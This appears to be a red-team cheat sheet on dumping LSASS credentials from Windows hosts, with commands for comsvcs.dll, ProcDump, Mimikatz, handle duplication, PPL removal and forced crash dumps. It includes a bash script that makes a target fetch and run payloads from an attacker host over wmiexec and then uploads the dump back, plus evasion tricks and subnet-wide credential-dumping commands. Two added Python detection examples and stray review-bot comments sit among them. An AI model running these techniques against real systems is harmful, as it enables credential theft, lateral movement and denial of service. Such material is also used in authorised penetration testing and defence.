# lsass.exe

* <https://s3cur3th1ssh1t.github.io/Reflective-Dump-Tools/>
* <https://redteamrecipe.com/50-Methods-For-Dump-LSASS/>

## Enumeration

* <https://www.mdsec.co.uk/2022/08/fourteen-ways-to-read-the-pid-for-the-local-security-authority-subsystem-service-lsass/>

Check whether lsass.exe runs as a protected process light (PPL):

```
PS > Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
```

A legitimate way to disable it is Microsoft's [LSA Protected Process Opt-out](https://www.microsoft.com/en-us/download/details.aspx?id=40897) tool:

```batch
mountvol X: /s
copy C:\LSAPPLConfig.efi X:\EFI\Microsoft\Boot\LSAPPLConfig.efi /Y
bcdedit /create {0cb3b571-2f2e-4343-a879-d86a476d7215} /d "DebugTool" /application osloader
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} path "\EFI\Microsoft\Boot\LSAPPLConfig.efi"
bcdedit /set {bootmgr} bootsequence {0cb3b571-2f2e-4343-a879-d86a476d7215}
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} loadoptions %1
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} device partition=X:
mountvol X: /d
shutdown -r -t 0
```

## MiniDumpWriteDump

### Parsers

* <https://github.com/cube0x0/MiniDump>
* <https://github.com/RobinFassinaMoschiniForks/LsaParser>
* <https://powerseb.github.io/posts/LSASS-parsing-without-a-cat/>
* <https://github.com/powerseb/PowerExtract>

### Custom Implementations

* <https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump>
* <https://github.com/w1u0u1/minidump>
* <https://github.com/helpsystems/nanodump/blob/main/source/nanodump.c>
* <https://github.com/YOLOP0wn/POSTDump/tree/main/POSTDump/POSTMiniDump>
* <https://ricardojoserf.github.io/nativedump/>
* <https://github.com/ricardojoserf/NativeDump>

### MiniDump Callbacks

* <https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass#minidumpwritedump-to-memory-using-minidump-callbacks>
* <https://github.com/m0rv4i/SafetyDump/blob/master/SafetyDump/Program.cs>
* <https://dec0ne.github.io/research/2022-11-14-Undetected-Lsass-Dump-Workflow/>

## Reusing Open Handles

* <https://rastamouse.me/duplicating-handles-in-csharp/>
* <https://rastamouse.me/dumping-lsass-with-duplicated-handles/>
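Every approach under MiniDumpWriteDump needs a handle to lsass.exe carrying at least `PROCESS_QUERY_INFORMATION | PROCESS_VM_READ` (the documented minimum for `MiniDumpWriteDump`), and that access mask is what a Sysmon Event ID 10 (ProcessAccess) rule keys on. The following is an added example, not code from any tool linked on this page: it parses Sysmon-style records, decodes `GrantedAccess`, and flags images outside an allow-list that obtained memory-read access to LSASS. The records and the allow-list are constructed. The handle-reuse techniques in this section are exactly why such an allow-list is noise reduction rather than a guarantee: they work from a handle some other process already holds instead of a fresh open by the dumping tool.

```python
"""Triage process-access events that grant memory-read rights on lsass.exe.

Added example for this page, not code from any of the tools linked here. The
record layout mirrors the message text of a Sysmon Event ID 10 (ProcessAccess)
event; SAMPLE_EVENTS and BENIGN_SOURCES are constructed for the demonstration.
"""
import re

# Process access rights from winnt.h
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# MiniDumpWriteDump documents PROCESS_QUERY_INFORMATION | PROCESS_VM_READ as its minimum
MINIDUMP_MASK = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ

RIGHT_NAMES = [
    ("VM_READ", PROCESS_VM_READ),
    ("VM_WRITE", PROCESS_VM_WRITE),
    ("DUP_HANDLE", PROCESS_DUP_HANDLE),
    ("QUERY_INFORMATION", PROCESS_QUERY_INFORMATION),
    ("QUERY_LIMITED_INFORMATION", PROCESS_QUERY_LIMITED_INFORMATION),
]

# Constructed allow-list of images that touch LSASS in a normal session; tune per estate
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed Sysmon-style records: two suspicious, two benign
SAMPLE_EVENTS = r"""
Process accessed:
RuleName: -
UtcTime: 2024-03-01 10:15:02.117
SourceProcessId: 4242
SourceImage: C:\Users\bob\Downloads\procdump64.exe
TargetProcessId: 712
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1FFFFF

Process accessed:
RuleName: -
UtcTime: 2024-03-01 10:15:03.004
SourceProcessId: 1180
SourceImage: C:\Windows\System32\svchost.exe
TargetProcessId: 712
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1410

Process accessed:
RuleName: -
UtcTime: 2024-03-01 10:16:44.390
SourceProcessId: 5010
SourceImage: C:\Windows\System32\rundll32.exe
TargetProcessId: 712
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1410

Process accessed:
RuleName: -
UtcTime: 2024-03-01 10:17:00.001
SourceProcessId: 6001
SourceImage: C:\Program Files\Inventory\agent.exe
TargetProcessId: 712
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1000
"""


def parse_events(text):
    """Split message text into records, one per blank-line separated block."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            events.append(rec)
    return events


def describe_rights(mask):
    """Name the rights in an access mask that matter for reading process memory."""
    return [name for name, bit in RIGHT_NAMES if mask & bit]


def triage(events):
    """Return (source_image, granted_access, verdict, rights) for suspicious LSASS opens."""
    hits = []
    for ev in events:
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        mask = int(ev.get("GrantedAccess", "0"), 16)
        if not (mask & PROCESS_VM_READ):
            continue  # no VM_READ: LSASS memory cannot be read, whatever else was granted
        source = ev.get("SourceImage", "")
        if source.lower() in BENIGN_SOURCES:
            continue
        verdict = ("MiniDumpWriteDump-capable" if (mask & MINIDUMP_MASK) == MINIDUMP_MASK
                   else "partial read access")
        hits.append((source, mask, verdict, describe_rights(mask)))
    return hits


if __name__ == "__main__":
    for source, mask, verdict, rights in triage(parse_events(SAMPLE_EVENTS)):
        print(f"[!] {source} -> lsass.exe GrantedAccess=0x{mask:X} ({verdict}: {', '.join(rights)})")
```

Run as-is, the two benign records drop out (one is allow-listed, one holds only `PROCESS_QUERY_LIMITED_INFORMATION`) and the two remaining opens are reported with the rights that make them dump-capable.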

### pypykatz

* <https://skelsec.medium.com/duping-av-with-handles-537ef985eb03>

```
Cmd > .\pypykatz.exe live lsa --method handledup
```

### SharpHandler

* <https://github.com/jfmaes/SharpHandler>
* <https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpHandler.ps1>

Scan for existing handles that can be duplicated:

```
PS > Invoke-SharpHandler -C "-s"
```

Write a gzip-compressed minidump to the specified location:

```
PS > Invoke-SharpHandler -C "-w -c -l=C:\Windows\Temp\pony.dat"
```

Dump and parse with SharpKatz's `logonpasswords`:

```
PS > Invoke-SharpHandler -C "-d"
```

### HandleKatz

* <https://github.com/codewhitesec/HandleKatz>

```
$ x86_64-w64-mingw32-gcc -o loader.exe loader.cpp -lcrypt32
Cmd > .\loader.exe --pid:852 --outfile:C:\Windows\Temp\dump.obfuscated
```

### LetMeowIn

* <https://github.com/Meowmycks/LetMeowIn>

## Silent Process Exit

* <https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/>
* <https://github.com/deepinstinct/LsassSilentProcessExit>
* <https://github.com/lengjibo/RedTeamTools/tree/master/windows/LsassSilentProcessExit>
* <https://github.com/CompassSecurity/PowerLsassSilentProcessExit>
* <https://gitlab.com/KevinJClark/csharptoolbox/-/blob/master/ShhProcessExit.cs>

## Remove PPL Protection

* <https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html>
* <https://itm4n.github.io/lsass-runasppl/>
* <https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/>
* <https://github.com/itm4n/PPLdump>
* <https://itm4n.github.io/the-end-of-ppldump/>
* <https://github.com/RedCursorSecurityConsulting/PPLKiller>
* <https://tastypepperoni.medium.com/running-exploit-as-protected-process-ligh-from-userland-f4c7dfe63387>
* <https://github.com/tastypepperoni/RunAsWinTcb>

Using the Mimikatz driver:

```
PS > sc.exe create mimidrv binPath= C:\Windows\Tasks\mimidrv.sys type= kernel start= demand
PS > sc.exe start mimidrv
PS > Invoke-Mimikatz -Command '"!processprotect /process:lsass.exe /remove" "exit"'
```

## Load SSP

* <https://blog.xpnsec.com/exploring-mimikatz-part-2/>
* <https://www.programmersought.com/article/65604621980/>
* <https://russianblogs.com/article/42611473286/>
* <https://xakep.ru/2023/03/15/windows-password/>
* <https://github.com/jas502n/mimikat_ssp>

### SspirConnectRpc

* <https://itm4n.github.io/ghost-in-the-ppl-part-2/>
* <https://github.com/itm4n/Pentest-Windows/blob/main/NdrServerCallAll/DuplicateHandle.cpp>

### MirrorDump

* <https://github.com/CCob/MirrorDump>
* <https://github.com/snovvcrash/MirrorDump>

```
Cmd > .\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824
Cmd > .\MirrorDump.exe --parse

$ python3 MirrorDump.py 0.0.0.0 31337 --md5 --parse
Cmd > .\MirrorDump.exe --host 10.10.13.37 --port 31337
```

### DuplicateDump

* <https://github.com/Hagrid29/DuplicateDump>

### nanodump

* <https://www.coresecurity.com/core-labs/articles/nanodump-red-team-approach-minidumps>
* <https://github.com/helpsystems/nanodump>

```
Cmd > .\load_ssp.x64.exe C:\Windows\Temp\nanodump_ssp.x64.dll
beacon> load_ssp
```

Do it automatically with `wmiexec.py` magic (using [this](https://gist.github.com/mildred/67d22d7289ae8f16cae7) Python HTTP server with PUT support):

{% code title="nanodump\_ssp.sh" %}

```bash
#!/usr/bin/env bash

# Usage:   sudo nanodump_ssp.sh <[DOMAIN\]USERNAME>:<PASSWORD> <TARGET> <LHOST> <LPORT>
# Example: sudo nanodump_ssp.sh 'megacorp.local\snovvcrash:Passw0rd!' 192.168.1.11 10.10.13.37 80

CREDS=$1
RHOST=$2
LHOST=$3
LPORT=$4

# Stage 1: the target fetches a.exe (load_ssp) and a.dll (nanodump_ssp) over HTTP and runs them
CMD="IWR -Uri http://${LHOST}/a.exe -OutFile C:\Windows\Temp\a.exe;IWR -Uri http://${LHOST}/a.dll -OutFile C:\Windows\Temp\a.dll;C:\Windows\Temp\a.exe C:\Windows\Temp\a.dll"
CMD_BASE64=$(echo -n "${CMD}" | iconv -t UTF-16LE | base64 -w0)

python3 -m http.server "${LPORT}" &
HTTP_PID=$!

wmiexec.py -silentcommand -nooutput "${CREDS}@${RHOST}" "powershell -enc ${CMD_BASE64}"
sleep 10

# Swap the plain HTTP server for one that accepts PUT so the dump can be uploaded back
kill -9 "${HTTP_PID}"
python3 put.py --bind=0.0.0.0 "${LPORT}" &
PUT_PID=$!

# Stage 2: upload the dump (written as report.docx) and remove the dropped files
CMD="IWR -Uri http://${LHOST}/out.bin -Method PUT -InFile C:\Windows\Temp\report.docx;rm C:\Windows\Temp\a.exe;rm C:\Windows\Temp\a.dll;rm C:\Windows\Temp\report.docx"
CMD_BASE64=$(echo -n "${CMD}" | iconv -t UTF-16LE | base64 -w0)

wmiexec.py -silentcommand -nooutput "${CREDS}@${RHOST}" "powershell -enc ${CMD_BASE64}"
sleep 30

kill -9 "${PUT_PID}"

# Restore the dump signature, then parse offline
bash restore_signature.sh out.bin
pypykatz lsa minidump out.bin

chown "${SUDO_USER}:${SUDO_USER}" out.bin
```

{% endcode %}

#### RToolZ

* <https://github.com/OmriBaso/RToolZ>

## Bypass Saving on Disk Detection

* <https://www.bussink.net/lsass-minidump-file-seen-as-malicious-by-mcafee-av/>
* <https://github.com/k4nfr3/Dumpert>
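The links in this section exist because AV recognises a minidump written to disk by its content, while the commands elsewhere on this page store the dump under names like `pony.dat`, `report.docx` or `pony.arj`. The defender's counterpart to the Parsers listed under MiniDumpWriteDump is therefore a content-based check rather than an extension filter. The following is an added example, not code from any project linked here: it validates the `MDMP` header, walks the stream directory to the module list and reports whether the dump came from a process carrying LSA authentication packages. Structure layouts follow dbghelp.h; the sample dump, the indicator module list and the file paths are constructed.

```python
"""Recognise a minidump by content, not by file name.

Added example for this page; it is not code from any project linked here.
Structure layouts follow the public MINIDUMP_HEADER, MINIDUMP_DIRECTORY,
MINIDUMP_MODULE_LIST and MINIDUMP_STRING definitions from dbghelp.h. The
sample file built by build_sample_dump() and the LSASS_MODULES indicator
list are constructed for the demonstration.
"""
import struct
import sys

MDMP_MAGIC = b"MDMP"          # MINIDUMP_HEADER.Signature
MODULE_LIST_STREAM = 4        # MINIDUMP_STREAM_TYPE.ModuleListStream
# Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
HEADER_FMT = "<4sIIIIIQ"
DIRECTORY_FMT = "<III"        # StreamType, Location.DataSize, Location.Rva
MODULE_SIZE = 108             # sizeof(MINIDUMP_MODULE)
MODULE_NAME_RVA_OFFSET = 20   # after BaseOfImage(8), SizeOfImage(4), CheckSum(4), TimeDateStamp(4)

# Authentication packages that are loaded into lsass.exe (constructed indicator list)
LSASS_MODULES = {"lsasrv.dll", "msv1_0.dll", "kerberos.dll", "wdigest.dll"}


def parse_header(data):
    """Return header fields as a dict, or None if the data is not a minidump."""
    if len(data) < struct.calcsize(HEADER_FMT) or data[:4] != MDMP_MAGIC:
        return None
    _, version, n_streams, dir_rva, _, timestamp, flags = struct.unpack_from(HEADER_FMT, data, 0)
    return {"version": version & 0xFFFF, "streams": n_streams,
            "dir_rva": dir_rva, "timestamp": timestamp, "flags": flags}


def read_directory(data, header):
    """Yield (stream_type, size, rva) for each MINIDUMP_DIRECTORY entry."""
    entry_size = struct.calcsize(DIRECTORY_FMT)
    for i in range(header["streams"]):
        off = header["dir_rva"] + entry_size * i
        if off + entry_size > len(data):
            break
        yield struct.unpack_from(DIRECTORY_FMT, data, off)


def read_string(data, rva):
    """Decode a MINIDUMP_STRING: ULONG32 byte length followed by UTF-16LE text."""
    if rva + 4 > len(data):
        return ""
    (length,) = struct.unpack_from("<I", data, rva)
    return data[rva + 4:rva + 4 + length].decode("utf-16-le", errors="replace")


def module_names(data):
    """Collect every module path recorded in the dump's ModuleListStream."""
    header = parse_header(data)
    if header is None:
        return []
    names = []
    for stream_type, _, rva in read_directory(data, header):
        if stream_type != MODULE_LIST_STREAM or rva + 4 > len(data):
            continue
        (count,) = struct.unpack_from("<I", data, rva)
        for i in range(count):
            entry = rva + 4 + MODULE_SIZE * i
            if entry + MODULE_SIZE > len(data):
                break
            (name_rva,) = struct.unpack_from("<I", data, entry + MODULE_NAME_RVA_OFFSET)
            names.append(read_string(data, name_rva))
    return names


def classify(data):
    """Return (is_minidump, looks_like_lsass, module_paths)."""
    names = module_names(data)
    basenames = {n.rsplit("\\", 1)[-1].lower() for n in names}
    return parse_header(data) is not None, bool(basenames & LSASS_MODULES), names


def build_sample_dump(module_path="C:\\Windows\\System32\\lsasrv.dll"):
    """Constructed sample: the smallest well-formed dump with one module entry."""
    name = module_path.encode("utf-16-le")
    dir_rva = struct.calcsize(HEADER_FMT)                 # directory right after the header
    list_rva = dir_rva + struct.calcsize(DIRECTORY_FMT)   # one directory entry
    name_rva = list_rva + 4 + MODULE_SIZE                 # string after NumberOfModules + one module
    header = struct.pack(HEADER_FMT, MDMP_MAGIC, 0xA793, 1, dir_rva, 0, 0, 0)
    directory = struct.pack(DIRECTORY_FMT, MODULE_LIST_STREAM, 4 + MODULE_SIZE, list_rva)
    module = struct.pack("<QIIII", 0x7FF800000000, 0x200000, 0, 0, name_rva)
    module += b"\x00" * (MODULE_SIZE - len(module))       # remaining MINIDUMP_MODULE fields zeroed
    string = struct.pack("<I", len(name)) + name + b"\x00\x00"
    return header + directory + struct.pack("<I", 1) + module + string


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            is_dump, lsass_like, names = classify(fh.read())
        print(f"{path}: minidump={is_dump} lsass_like={lsass_like} modules={len(names)}")
```

Pointed at a directory of files the script reads each one in full, so for large dumps a real deployment would map the file and read only the header, directory and module list; the classification logic stays the same.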

## NTFS Transactions

### TransactedSharpMiniDump

* <https://www.cybermongol.ca/operator-research/dump-lsass-with-sharpminidump-ntfs-transactions-uac-bypass-exfil-dmp-file-to-dropbox>
* <https://github.com/PorLaCola25/TransactedSharpMiniDump>

### CredBandit

* <https://www.cobaltstrike.com/blog/credbandit-a-review-of-a-tool-developed-built-by-the-cobalt-strike-user-community/>
* <https://github.com/anthemtotheego/CredBandit>
* <https://github.com/xforcered/CredBandit>
* <https://github.com/xenoscr/compressedCredBandit>

### Dumpy

* <https://github.com/Kudaes/Dumpy/blob/341a7e47ab0e12ae3635cd0077fff1a172fef769/dumpy/dumper/src/lib.rs#L216-L429>

## Kernel Mode

* <https://zerosum0x0.blogspot.com/2020/08/sassykitdi-kernel-mode-tcp-sockets.html>

### Abusing Gigabyte Driver

**CVE-2018-19320**

* <https://www.matteomalvica.com/blog/2020/07/15/silencing-the-edr/>
* <https://www.secureauth.com/labs-old/gigabyte-drivers-elevation-of-privilege-vulnerabilities/>
* <https://github.com/uf0o/windows-ps-callbacks-experiments/tree/master/evil-driver>
* <https://github.com/fengjixuchui/gdrv-loader>
* <https://github.com/ASkyeye/CVE-2018-19320>

## Physical Memory

Convert VMware snapshot to a memory dump with [vmss2core](https://kb.vmware.com/s/article/2003941):

```
Cmd > vmss2core.exe -W/-W8 Snapshot.vmsn Snapshot.vmem
```

### Crash Dumps

* <https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-3-windbg-mimikatz-extension/>

Get current `CrashControl` settings and set `CrashDumpEnabled` to **0x01** (default dump location is `C:\Windows\MEMORY.dmp`):

```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl'
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v CrashDumpEnabled -vt REG_DWORD -vd 1
```

Crash the target machine, e.g. with [NotMyFault](https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault):

{% hint style="warning" %}
**This action causes a DoS!** Do it at your own risk.
{% endhint %}

```
$ cme smb 192.168.1.1 -u snovvcrash -p 'Passw0rd!' -x '\\10.10.13.37\notmyfaultc64.exe -accepteula /crash 0x03' --no-output
```

Parse LSASS with Mimikatz and [WinDbg](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools#small-classic-windbg-preview-logo-debugging-tools-for-windows-windbg):

```
kd> .load C:\mimilib.dll
kd> .SymFix
kd> .Reload
kd> !process 0 0 lsass.exe
kd> .process /r /p fffffa80072b2b10
kd> !mimikatz
```

{% hint style="info" %}
To add debug symbols: `File` → `Symbol file path` → `SRV*https://msdl.microsoft.com/download/symbols`.
{% endhint %}

Or with [Pypykatz plugin](https://github.com/skelsec/pypykatz-volatility3) for Volatility 3:

```
$ pip install volatility3 pypykatz
$ git clone https://github.com/volatilityfoundation/volatility3 ~/tools/volatility3
$ git clone https://github.com/skelsec/pypykatz-volatility3 ~/tools/pypykatz-volatility3
$ cd ~/tools/volatility3
$ python3 vol.py -f /path/to/MEMORY.dmp -p ../pypykatz-volatility3 pypykatz
```

{% hint style="info" %}
The [current](https://github.com/skelsec/pypykatz-volatility3/blob/38c96c5d8053c38f1ac594f4c50bd54561f88534/vol_pypykatz.py) version of `vol_pypykatz.py` needs some changes to work with the current version of Volatility 3:

{% code title="vol\_pypykatz.py.patch" %}

```diff
diff --git a/vol_pypykatz.py b/vol_pypykatz.py
index 6c9592f..f53da1d 100644
--- a/vol_pypykatz.py
+++ b/vol_pypykatz.py
@@ -19,7 +19,7 @@ vollog = logging.getLogger(__name__)

 class pypykatz(interfaces.plugins.PluginInterface):

-    _required_framework_version = (1, 0, 0)
+    _required_framework_version = (2, 0, 0)

     @classmethod
     def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:
@@ -38,18 +38,4 @@ class pypykatz(interfaces.plugins.PluginInterface):
         ]

     def run(self):
-        return renderers.TreeGrid(
-            [
-                ("Credential Type", str),
-                ("Domain Name", str),
-                ("Username", str),
-                ("NThash", str),
-                ("LMHash", str),
-                ("SHAHash", str),
-                ("masterkey", str),
-                ("masterkey (sha1)", str),
-                ("key_guid", str),
-                ("password", str),
-            ],
-            pparser.go_volatility3(self),
-        )
+        return pparser.go_volatility3(self)
```

{% endcode %}
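Review bot: In the first hunk, bumping `_required_framework_version` to `(2, 0, 0)` declares compatibility with the 2.x framework API but records nothing about which Volatility 3 release the plugin was actually verified against; add a short comment next to the tuple (or a line in the commit message) naming that release, so the next framework bump can be audited rather than guessed.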
{% endhint %}
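Review bot: In the second hunk, `run()` now returns `pparser.go_volatility3(self)` directly, so the plugin only renders if that pypykatz function itself builds and returns the `TreeGrid` with the column list this hunk deletes; the patch should state that dependency on the matching pypykatz version, since a mismatch yields a plugin that loads but cannot render its output. If `renderers` is not referenced anywhere else in the file after this change, drop its import in the same patch.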

### Physmem2profit

* <https://labs.withsecure.com/blog/rethinking-credential-theft/>
* <https://github.com/FSecureLABS/physmem2profit>
* <https://github.com/Velocidex/WinPmem/releases/tag/v4.0.rc1>

Server:

```
PS > .\Physmem2profit.exe --ip 192.168.1.11 --port 1337 --verbose [--hidden]
```

Client:

```
$ python3 physmem2profit --host 192.168.1.11 --port 1337 --install "C:/Windows/Temp/winpmem_x64.sys" --mode all --driver winpmem
```

## Credential Guard

Check whether Credential Guard is present ([ref](https://gist.github.com/frayos/69fe2f3fa1990478f26c289baf7ca083)):

```powershell
# Credential Guard is security service 1 in the Win32_DeviceGuard arrays
$DevGuard = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
if ($DevGuard.SecurityServicesConfigured -contains 1) {"Credential Guard configured"}
if ($DevGuard.SecurityServicesRunning -contains 1) {"Credential Guard running"}
```

### Patch and Bypass

* <https://icebreaker.team/blogs/sleeping-with-control-flow-guard/>

Patch the `g_fParameter_UseLogonCredential` and `g_IsCredGuardEnabled` variables at their hard-coded offsets within `wdigest.dll` as loaded by LSASS:

* <https://teamhydra.blog/2020/08/25/bypassing-credential-guard/>
* <https://gist.github.com/N4kedTurtle/8238f64d18932c7184faa2d0af2f1240>

Resolve `g_fParameter_UseLogonCredential` and `g_IsCredGuardEnabled` variable offsets dynamically at runtime:

* <https://itm4n.github.io/credential-guard-bypass/>
* <https://github.com/itm4n/Pentest-Windows/blob/main/CredGuardBypassOffsets/poc.cpp>

The two PoCs above, merged:

* <https://gist.github.com/snovvcrash/43e976779efdd20df1596c6492198c99>

### PassTheChallenge

* <https://research.ifcr.dk/pass-the-challenge-defeating-windows-defender-credential-guard-31a892eee22>
* <https://github.com/ly4k/PassTheChallenge>

### CVE-2025-21299, CVE-2025-29809

* <https://www.netspi.com/blog/technical-blog/adversary-simulation/cve-2025-21299-cve-2025-29809-unguarding-microsoft-credential-guard/>

## Attacking vSphere

* <https://jamescoote.co.uk/introducing-sharpsphere/>
* <https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/>
* <https://github.com/JamesCooteUK/SharpSphere>

## Tools

### comsvcs.dll

* <https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>
* <https://github.com/Hackndo/lsassy/blob/master/lsassy/dumpmethod/comsvcs.py>
* <https://gist.github.com/JohnLaTwC/3e7dd4cd8520467df179e93fb44a434e>
* <https://sp00ks-git.github.io/posts/LSASS-Encrypted-Dump/>
* <https://badoption.eu/blog/2023/06/21/dumpit.html>

```
PS > $proc = 'ls'+'Ass'
PS > Get-Process $proc
PS > rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\System32\spool\drivers\color\pony.dat full
```

Without touching the local disk (writing to an SMB share instead):

```
PS > net use z: \\10.10.13.37\share
PS > rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump (Get-Process ('ls'+'Ass')).id z:\pony.dat full
```

One-liner:

```
Cmd > %COMSPEC% /Q /c echo powershell.exe -NoP -C "%WINDIR%\System32\rundll32.exe %WINDIR%\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id %WINDIR%\Temp\pony.arj full;Wait-Process -Id (Get-Process rundll32).Id" 2^>^&1 > temp.bat & %COMSPEC% /Q /c temp.bat & del temp.bat
```

### ProcDump

* <https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>
* <https://download.sysinternals.com/files/Procdump.zip>
* <https://live.sysinternals.com/>

```
PS > wget http://live.sysinternals.com/PsExec64.exe -o psexec.exe
PS > .\procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
```

#### Process Argument Spoofing

* <https://xre0us.io/posts/multidump/>
* <https://github.com/Xre0uS/MultiDump/tree/main>

### Mimikatz

* <https://github.com/gentilkiwi/mimikatz/releases>
* <https://redteamrecipe.com/64-Methods-For-Execute-Mimikatz/>

```
PS > .\mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "sekurlsa::logonpasswords full" "exit"
```

{% hint style="warning" %}
For Windows 10 versions 1803-1809 use [Mimikatz v2.1.1](https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip); see [Key import error](https://github.com/gentilkiwi/mimikatz/issues/248).
{% endhint %}

Parse MiniDump:

```
PS > .\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
```

Grep for creds:

```
$ grep -a '* Username : ' out.txt -A2 | grep -a -e Username -e Password -e NTLM | grep -a -v null | xclip -i -sel c
```

#### kiwi

```
meterpreter > getsystem
meterpreter > load kiwi
meterpreter > creds_msv
meterpreter > creds_wdigest
meterpreter > lsa_dump_secrets
meterpreter > creds_all
meterpreter > kiwi_cmd '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "exit"'
```

### pypykatz

* <https://github.com/skelsec/pypykatz/releases/latest>

Install and run:

```
$ pipx install -f "git+https://github.com/skelsec/pypykatz.git"
$ pypykatz lsa minidump lsass.DMP [-k /tmp/krb] [-g/--grep] [-p msv wdigest kerberos]
```

Parse with a jq one-liner:

```bash
pypykatz lsa minidump lsass.DMP --json > /tmp/lsass.json
cat /tmp/lsass.json | jq '.[].logon_sessions[] | "\nTime   : \(.logon_time)", "Server : \(.logon_server)", (.wdigest_creds[] | select(.password != null or .password_raw != "") | "WD     : \(.domainname)\\\(.username):\(.password // .password_raw)"), (.msv_creds[] | "NT     : \(.domainname)\\\(.username):\(.NThash // "N/A")"), (.kerberos_creds[] | select(.password != null or .password_raw != "") | "KRB    : \(.domainname)\\\(.username):\(.password // .password_raw)")' -r | tail -n +2 | bat --paging=never --theme=ansi
```

Pipe the output to this script to print the parsed credentials with colors:

{% code title="pypyparse.py" %}

```python
#!/usr/bin/python3
# Read pypykatz text output from stdin and print unique DOMAIN\user:secret pairs
import re
import sys

a = sys.stdin.read()


def pp(x):
    """Print a result line in bold with a highlighted value."""
    print(f'\033[1m[+] \033[93m{x}\033[0m')


# Blocks with Username / Domain / <one skipped line> / NT hash
s = set()
for u, d, h in re.findall(r'\s+Username: (.*)\n\s+Domain: (.*)\n.*\n\s+NT: (.*)', a):
    if u and h:
        s.add(d + '\\' + f'{u}:{h}')
for i in s:
    pp(i)

# Blocks with Username / Domain / Password
s = set()
for u, d, p in re.findall(r'\s+Username: (.*)\n\s+Domain: (.*)\n\s+Password: (.*)', a):
    if u and p:
        s.add(d + '\\' + f'{u}:{p}')
for i in s:
    pp(i)

# Lower-case blocks with username / domainname / password (skip the literal 'None')
s = set()
for u, d, p in re.findall(r'\s+username (.*)\n\s+domainname (.*)\n\s+password (.*)', a):
    if u and p and p != 'None':
        s.add(d + '\\' + f'{u}:{p}')
for i in s:
    pp(i)
```

{% endcode %}

### spraykatz

* <https://github.com/aas-n/spraykatz>

```
$ python3 spraykatz.py -u snovvcrash -p 'Passw0rd!' -t 10.10.13.37,10.10.13.38,10.10.13.39
```

### Dumpert

* <https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/>
* <https://github.com/outflanknl/Dumpert>

Dump lsass.exe using direct syscalls and removing user-land API hooks:

```
Cmd > rundll32.exe .\Outflank-Dumpert-DLL.dll,Dump
```

Using [sRDI](https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/) (**s**hellcode **R**eflective **D**LL **I**njection) technique:

1. Compile [*Outflank-Dumpert-DLL.dll*](https://github.com/outflanknl/Dumpert/tree/master/Dumpert-DLL).
2. Convert it to position independent shellcode with [*ConvertToShellcode.py*](https://github.com/monoxgas/sRDI/blob/master/Python/ConvertToShellcode.py): `python3 ConvertToShellcode.py Outflank-Dumpert-DLL.dll`.
3. Use a shellcode loader of your choice to dump LSASS.

### lsassy

* <https://github.com/Hackndo/lsassy>
* <https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/lsassy.py>
* <https://en.hackndo.com/remote-lsass-dump-passwords/>

```
$ lsassy 10.10.13.0/24 -d megacorp.local -u snovvcrash -p 'Passw0rd!'
$ cme smb 10.10.13.0/24 -u snovvcrash -p 'Passw0rd!' -M lsassy
```

### MalSeclogon

* <https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html>
